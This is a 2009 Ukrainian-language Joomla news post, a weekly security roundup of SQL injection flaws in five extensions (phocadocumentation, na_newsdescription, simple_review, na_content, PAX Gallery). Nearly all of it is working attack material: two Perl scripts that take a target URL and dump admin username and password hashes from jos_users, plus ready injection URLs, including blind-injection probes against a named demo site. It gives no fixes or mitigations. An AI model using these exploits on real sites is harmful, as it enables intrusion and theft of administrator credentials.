Тижневик безпеки №02
06.01.2009, 14:46 | Новини розширень Joomla! | Денис Носов
За минулий тиждень, знайдено вразливості у наступних розширеннях: phocadocumentation, na_newsdescription, simple_review 1.x, na_content 1.0, PAX Gallery 0.1.
com_phocadocumentation SQL-ін’єкція
use LWP::UserAgent; print "\nSite ismi Target page:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); $column_name="concat(username,0x3a,password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/index.php?option=com_phocadocumentation&view=section&id=1+AND+1=2+UNION+SELECT+".$column_name.",1,2+from/**/".$table_name."--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n\n"; print "# Tebrikler Exploit Calisti! #\n\n"; } else{print "\n[-] Exploit Bulunamadı...\n"; }
com_na_newsdescription SQL-ін’єкція
use LWP::UserAgent; print "\nSite ismi Target page:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); $column_name="concat(username,0x3a,password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "/index.php?option=com_na_newsdescription&task=show&groupId=17377_19&newsid=85790+AND+1=2+UNION+SELECT+".$column_name.",1,2,3,4,5,6,7+from/**/".$table_name."--";< BR>$res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ print "\n[+] Admin Hash : $1\n\n"; print "# Tebrikler Exploit Calisti! #\n\n"; } else{print "\n[-] Exploit Bulunamadı...\n"; }
com_na_newsdescription SQL-ін’єкція
Приклад:
www.example.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--
com_na_content 1.0 SQL-ін’єкція
Експлойти:
/index.php?option=com_na_content&task=view&id=1 having 1=0 /index.php?option=com_na_content&task=view&id=1 having 1=1 або /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4 /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=5
PAX Gallery v 0.1 (gid) SQL-ін’єкція
Експлойт:
http://www.example.com/path/com_paxgallery&task=table&gid=[$qL]
Демо:
http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5 [Ye$] http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo] http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100